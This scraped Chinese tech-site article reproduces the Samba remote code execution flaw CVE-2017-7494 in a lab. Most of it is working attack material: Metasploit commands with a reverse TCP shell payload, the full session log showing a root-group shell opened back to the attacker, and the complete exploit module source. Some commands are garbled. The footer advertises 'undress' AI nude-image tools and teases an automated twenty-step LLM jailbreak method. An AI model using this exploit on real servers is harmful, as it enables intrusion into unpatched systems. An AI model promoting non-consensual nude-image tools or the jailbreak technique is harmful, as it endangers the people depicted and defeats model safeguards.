Operation and Maintenance
Linux Operation and Maintenance
Detailed example of Samba remote code execution vulnerability
Detailed example of Samba remote code execution vulnerability
Samba是在Linux和UNIX系统上实现SMB协议的一个软件。
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
360网络安全中心 和 360信息安全部的Gear Team第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。
漏洞简述
▼▼
漏洞编号:CVE-2017-7494
危害等级:严重
影响版本:Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本
漏洞描述:2017年5月24日Samba发布了4.6.4版本,修复了一个严重的远程代码执行漏洞,该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
技术分析
▼▼
如官方所描述,该漏洞只需要通过一个可写入的Samba用户权限就可以提权到samba所在服务器的root权限(samba默认是root用户执行的)。
一、复现环境搭建
搭建Debian和kali两个虚拟机: 攻击机:kali (192.168.217.162); 靶机:debian (192.168.217.150)。
二、Debian安装并配置samba
1、首先,下载安装samba服务器
# apt-get install samba
2、在debian下创建一个共享目录,我这里为/mnt/shared
# mkdir /mnt/shared
3、配置samba服务器的配置文件/etc/samba/smb.conf,在最后添加:
[shared] comment = 'Share for work' path= /mnt/shared guest ok = yes public = yes writable = yes create mask = 0777
4、设置/mnt/shared权限
# chmod –R /mnt/sspaned
5、重启samba服务
# /etc/init.d/samba restart
三、设置攻击机kali
打开kali终端进入到metasploit的exploit目录下的linux文件夹,并新建一个smb文件夹,将攻击脚本放入其中:
# cd /usr/share/metasploit-framework/modules/exploits/linux # mkdir smb # wget
运行metasploit,开始进行攻击(攻击脚本被我重命名为(cve-2017-7494.rb)
# msfconsole msf > use exploit/linux/smb/cve-2017-7494 msf exploit(cve-2017-7494) > set rhost 192.168.217.150 rhost => 192.168.217.150 msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp payload => linux/x64/shell/reverse_tcp msf exploit(cve-2017-7494) > set lhost 192.168.217.162 rhost => 192.168.217.162 msf exploit(cve-2017-7494) > run [*] Started reverse TCP handler on 192.168.217.162:4444 [*] 192.168.217.150:445 - Using location \\192.168.217.150\shared\ for the path [*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so [*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so... [*] Sending stage (38 bytes) to 192.168.217.150 [*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400 id uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup) ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:6e:9a:4a inet addr:192.168.217.150 Bcast:192.168.217.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6769 errors:0 dropped:0 overruns:0 frame:0 TX packets:700 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:479898 (468.6 KiB) TX bytes:102796 (100.3 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:35 errors:0 dropped:0 overruns:0 frame:0 TX packets:35 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:3557 (3.4 KiB) TX bytes:3557 (3.4 KiB) whoami nobody
POC:
1 ## 2 # This module requires Metasploit: 3 # Current source: 4 ## 5 6 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, 'Name' => 'Samba is_known_pipename() Arbitrary Module Load', 7 'Description' => %q{ 8 This module triggers an arbitrary shared library load vulnerability 9 in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module 10 requires valid credentials, a writeable folder in an accessible share, 11 and knowledge of the server-side path of the writeable folder. In 12 some cases, anonymous access combined with common filesystem locations 13 can be used to automatically exploit this vulnerability. 14 }, 15 'Author' => 16 [ 17 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery 18 'hdm', # Metasploit Module 19 ], 20 'License' => MSF_LICENSE, 21 'References' => 22 [ 23 [ 'CVE', '2017-7494' ], 24 [ 'URL', '' ], 25 ], 26 'Payload' => 27 { 28 'Space' => 9000, 29 'DisableNops' => true 30 }, 31 'Platform' => 'linux', 32 # 33 # Targets are currently limited by platforms with ELF-SO payload wrappers 34 # 35 'Targets' => 36 [ 37 [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ], 38 [ 'Linux x86', { 'Arch' => ARCH_X86 } ], 39 [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ], 40 # [ 'Linux MIPS', { 'Arch' => MIPS } ], 41 ], 42 'Privileged' => true, 43 'DisclosureDate' => 'Mar 24 2017', 44 'DefaultTarget' => 2)) 45 46 register_options( 47 [ 48 OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']), 49 OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']), 50 OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']), 51 ]) 52 end 53 54 55 def generate_common_locations 56 candidates = [] 57 if datastore['SMB_SHARE_BASE'].to_s.length > 0 58 candidates << datastore['SMB_SHARE_BASE'] 59 end 60 61 %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name| 62 candidates << base_name 63 candidates << [base_name, @share] 64 candidates << [base_name, @share.downcase] 65 candidates << [base_name, @share.upcase] 66 candidates << [base_name, @share.capitalize] 67 candidates << [base_name, @share.gsub(" ", "_")] 68 end 69 70 candidates.uniq 71 end 72 73 def enumerate_directories(share) 74 begin 75 self.simple.connect("\\\\#{rhost}\\#{share}") 76 stuff = self.simple.client.find_first("\\*") 77 directories = [""] 78 stuff.each_pair do |entry,entry_attr| 79 next if %W{. ..}.include?(entry) 80 next unless entry_attr['type'] == 'D' 81 directories << entry end return directories rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e 82 vprint_error("Enum #{share}: #{e}") 83 return nil 84 85 ensure 86 if self.simple.shares["\\\\#{rhost}\\#{share}"] 87 self.simple.disconnect("\\\\#{rhost}\\#{share}") 88 end 89 end 90 end 91 92 def verify_writeable_directory(share, directory="") 93 begin 94 self.simple.connect("\\\\#{rhost}\\#{share}") 95 96 random_filename = Rex::Text.rand_text_alpha(5)+".txt" 97 filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}" 98 99 wfd = simple.open(filename, 'rwct')100 wfd << Rex::Text.rand_text_alpha(8) wfd.close simple.delete(filename) return true rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e101 vprint_error("Write #{share}#{filename}: #{e}")102 return false103 104 ensure105 if self.simple.shares["\\\\#{rhost}\\#{share}"]106 self.simple.disconnect("\\\\#{rhost}\\#{share}")107 end108 end109 end110 111 def share_type(val)112 [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]113 end114 115 def enumerate_shares_lanman116 shares = []117 begin118 res = self.simple.client.trans(119 "\\PIPE\\LANMAN",120 (121 [0x00].pack('v') +122 "WrLeh\x00" +123 "B13BWz\x00" +124 [0x01, 65406].pack("vv")125 ))126 rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e127 vprint_error("Could not enumerate shares via LANMAN")128 return []129 end130 if res.nil?131 vprint_error("Could not enumerate shares via LANMAN")132 return []133 end134 135 lerror, lconv, lentries, lcount = res['Payload'].to_s[136 res['Payload'].v['ParamOffset'],137 res['Payload'].v['ParamCount']138 ].unpack("v4")139 140 data = res['Payload'].to_s[141 res['Payload'].v['DataOffset'],142 res['Payload'].v['DataCount']143 ]144 145 0.upto(lentries - 1) do |i|146 sname,tmp = data[(i * 20) + 0, 14].split("\x00")147 stype = data[(i * 20) + 14, 2].unpack('v')[0]148 scoff = data[(i * 20) + 16, 2].unpack('v')[0]149 scoff -= lconv if lconv != 0150 scomm,tmp = data[scoff, data.length - scoff].split("\x00")151 shares << [ sname, share_type(stype), scomm] end shares end def probe_module_path(path) begin simple.create_pipe(path) rescue Rex::Proto::SMB::Exceptions::ErrorCode => e152 vprint_error("Probe: #{path}: #{e}")153 end154 end155 156 def find_writeable_path(share)157 subdirs = enumerate_directories(share)158 return unless subdirs159 160 if datastore['SMB_FOLDER'].to_s.length > 0161 subdirs.unshift(datastore['SMB_FOLDER'])162 end163 164 subdirs.each do |subdir|165 next unless verify_writeable_directory(share, subdir)166 return subdir167 end168 169 nil170 end171 172 def find_writeable_share_path173 @path = nil174 share_info = enumerate_shares_lanman175 if datastore['SMB_SHARE_NAME'].to_s.length > 0176 share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']177 end178 179 share_info.each do |share|180 next if share.first.upcase == 'IPC$'181 found = find_writeable_path(share.first)182 next unless found183 @share = share.first184 @path = found185 break186 end187 end188 189 def find_writeable190 find_writeable_share_path191 unless @share && @path192 print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")193 fail_with(Failure::NoTarget, "No matching target")194 end195 print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")196 end197 198 def upload_payload199 begin200 self.simple.connect("\\\\#{rhost}\\#{@share}")201 202 random_filename = Rex::Text.rand_text_alpha(8)+".so"203 filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"204 wfd = simple.open(filename, 'rwct')205 wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform}206 )207 wfd.close208 209 @payload_name = random_filename210 return true211 212 rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e213 print_error("Write #{@share}#{filename}: #{e}")214 return false215 216 ensure217 if self.simple.shares["\\\\#{rhost}\\#{@share}"]218 self.simple.disconnect("\\\\#{rhost}\\#{@share}")219 end220 end221 end222 223 def find_payload224 print_status("Payload is stored in //#{rhost}/#{@share}/#{@path} as #{@payload_name}")225 226 # Reconnect to IPC$227 simple.connect("\\\\#{rhost}\\IPC$")228 229 #230 # In a perfect world we would find a way make IPC$'s associated CWD231 # change to our share path, which would allow the following code:232 #233 # probe_module_path("/proc/self/cwd/#{@path}/#{@payload_name}")234 #235 236 # Until we find a better way, brute force based on common paths237 generate_common_locations.each do |location|238 target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/')239 print_status("Trying location #{target}...")240 probe_module_path(target)241 end242 end243 244 def exploit245 # Setup SMB246 connect247 smb_login248 249 # Find a writeable share250 find_writeable251 252 # Upload the shared library payload253 upload_payload254 255 # Find and execute the payload from the share256 find_payload rescue Rex::StreamClosedError257 258 # Shutdown259 disconnect260 end261 262 end
The above is the detailed content of Detailed example of Samba remote code execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1379
52
Python script to be executed every 5 minutes
Sep 10, 2023 pm 03:33 PM
Automation and task scheduling play a vital role in streamlining repetitive tasks in software development. Imagine there is a Python script that needs to be executed every 5 minutes, such as getting data from an API, performing data processing, or sending periodic updates. Running scripts manually so frequently can be time-consuming and error-prone. This is where task scheduling comes in. In this blog post, we will explore how to schedule a Python script to execute every 5 minutes, ensuring it runs automatically without manual intervention. We will discuss different methods and libraries that can be used to achieve this goal, allowing you to automate tasks efficiently. An easy way to run a Python script every 5 minutes using the time.sleep() function is to utilize tim
How to use Python for scripting and execution in Linux
Oct 05, 2023 am 11:45 AM
How to use Python to write and execute scripts in Linux In the Linux operating system, we can use Python to write and execute various scripts. Python is a concise and powerful programming language that provides a wealth of libraries and tools to make scripting easier and more efficient. Below we will introduce the basic steps of how to use Python for script writing and execution in Linux, and provide some specific code examples to help you better understand and use it. Install Python
Jailbreak any large model in 20 steps! More 'grandma loopholes' are discovered automatically
Nov 05, 2023 pm 08:13 PM
In less than a minute and no more than 20 steps, you can bypass security restrictions and successfully jailbreak a large model! And there is no need to know the internal details of the model - only two black box models need to interact, and the AI can fully automatically defeat the AI and speak dangerous content. I heard that the once-popular "Grandma Loophole" has been fixed: Now, facing the "Detective Loophole", "Adventurer Loophole" and "Writer Loophole", what response strategy should artificial intelligence adopt? After a wave of onslaught, GPT-4 couldn't stand it anymore, and directly said that it would poison the water supply system as long as... this or that. The key point is that this is just a small wave of vulnerabilities exposed by the University of Pennsylvania research team, and using their newly developed algorithm, AI can automatically generate various attack prompts. Researchers say this method is better than existing
How to install and configure Samba file sharing service in Debian
Mar 28, 2024 am 11:16 AM
Installing and configuring the Samba file sharing service in Debian can be completed by the following steps: 1. Install Samba: First, install Samba using the apt package manager: sudoaptupdate sudoaptinstallsamba 2. Configure Samba: Edit Samba’s main configuration file /etc/samba/smb .conf: sudonano/etc/samba/smb.conf In the file, you can define the configuration of the shared directory and shared user. The following is an example configuration: [share] comment=SharedFolder
Buffer overflow vulnerability in Java and its harm
Aug 09, 2023 pm 05:57 PM
Buffer overflow vulnerabilities in Java and their harm Buffer overflow means that when we write more data to a buffer than its capacity, it will cause data to overflow to other memory areas. This overflow behavior is often exploited by hackers, which can lead to serious consequences such as abnormal code execution and system crash. This article will introduce buffer overflow vulnerabilities and their harm in Java, and give code examples to help readers better understand. The buffer classes widely used in Java include ByteBuffer, CharBuffer, and ShortB
Graphic tutorial for installing Samba on Ubuntu
Jan 05, 2024 pm 04:38 PM
If we are doing corresponding development in the Ubuntu environment, sometimes we need to share the program we wrote with others, or copy it ourselves and make a backup copy. We are accustomed to using USB flash drives for copying, but this will be inconvenient if frequent copies are needed. Here is a better way to introduce to you: sharing through Samba server. Samba is a free software that implements the SMB protocol on Linux and UNIX systems. It consists of server and client programs. The Samba server builds a bridge between two different operating systems, enabling communication between Linux systems and Windows systems. Windows host access can be achieved through the samba service under the Linux operating system
How to solve common file upload vulnerabilities in PHP language development?
Jun 10, 2023 am 11:10 AM
In the development of web applications, the file upload function has become a basic requirement. This feature allows users to upload their own files to the server and then store or process them on the server. However, this feature also makes developers need to pay more attention to a security vulnerability: the file upload vulnerability. Attackers can attack the server by uploading malicious files, causing the server to suffer varying degrees of damage. PHP language is one of the languages widely used in web development, and file upload vulnerabilities are also one of the common security issues. This article will introduce
The OpenAI DALL-E 3 model has a vulnerability that generates 'inappropriate content.' A Microsoft employee reported it and was slapped with a 'gag order.'
Feb 04, 2024 pm 02:40 PM
According to news on February 2, Shane Jones, manager of Microsoft’s software engineering department, recently discovered a vulnerability in OpenAI’s DALL-E3 model, which is said to be able to generate a series of inappropriate content. Shane Jones reported the vulnerability to the company, but was asked to keep it confidential. However, he eventually decided to disclose the vulnerability to the outside world. ▲Image source: Report disclosed by ShaneJones. This site noticed that ShaneJones discovered through independent research in December last year that there was a vulnerability in the DALL-E3 model of OpenAI text-generated images. This vulnerability can bypass the AI Guardrail (AIGuardrail), resulting in the generation of a series of NSFW inappropriate content. This discovery attracted widespread attention
